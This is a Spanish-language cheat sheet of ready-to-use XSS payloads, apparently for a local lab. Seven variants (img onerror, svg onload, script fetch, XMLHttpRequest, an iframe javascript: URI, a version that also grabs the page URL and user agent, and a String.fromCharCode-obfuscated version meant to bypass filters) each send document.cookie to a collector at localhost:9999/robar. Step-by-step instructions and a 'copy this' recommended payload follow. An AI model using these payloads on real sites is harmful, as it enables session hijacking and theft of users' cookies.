// 🚨 PAYLOADS XSS PARA ROBAR COOKIES - LISTOS PARA USAR

// ===============================================
// MÉTODO 1: Imagen (Más efectivo y siempre funciona)
// ===============================================

<img src=x onerror="var img=new Image();img.src='http://localhost:9999/robar?c='+encodeURIComponent(document.cookie);">

// ===============================================
// MÉTODO 2: SVG (Compacto y efectivo)
// ===============================================

<svg onload="fetch('http://localhost:9999/robar?c='+encodeURIComponent(document.cookie))">

// ===============================================
// MÉTODO 3: Script con fetch (Moderno)
// ===============================================

<script>fetch('http://localhost:9999/robar?c='+encodeURIComponent(document.cookie))</script>

// ===============================================
// MÉTODO 4: XMLHttpRequest (Compatible)
// ===============================================

<img src=x onerror="var x=new XMLHttpRequest();x.open('GET','http://localhost:9999/robar?c='+encodeURIComponent(document.cookie));x.send();">

// ===============================================
// MÉTODO 5: Iframe (Silencioso)
// ===============================================

<iframe src="javascript:var img=new Image();img.src='http://localhost:9999/robar?c='+encodeURIComponent(document.cookie);">

// ===============================================
// MÉTODO 6: Con información adicional
// ===============================================

<img src=x onerror="var img=new Image();img.src='http://localhost:9999/robar?c='+encodeURIComponent(document.cookie)+'&url='+encodeURIComponent(location.href)+'&ua='+encodeURIComponent(navigator.userAgent);">

// ===============================================
// MÉTODO 7: URL encoding para bypassear filtros
// ===============================================

<img src=x onerror="eval(String.fromCharCode(118,97,114,32,105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,57,57,57,57,47,114,111,98,97,114,63,99,61,39,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))">

// ===============================================
// CÓMO USAR:
// ===============================================
// 1. Inicia el servidor: python3 servidor_simple.py
// 2. Copia cualquier payload de arriba
// 3. Pégalo en el campo de búsqueda del XSS
// 4. Presiona buscar
// 5. Revisa la terminal del servidor para ver las cookies robadas

// ===============================================
// PAYLOAD RECOMENDADO (COPIA ESTO):
// ===============================================

<img src=x onerror="var img=new Image();img.src='http://localhost:9999/robar?c='+encodeURIComponent(document.cookie);"> 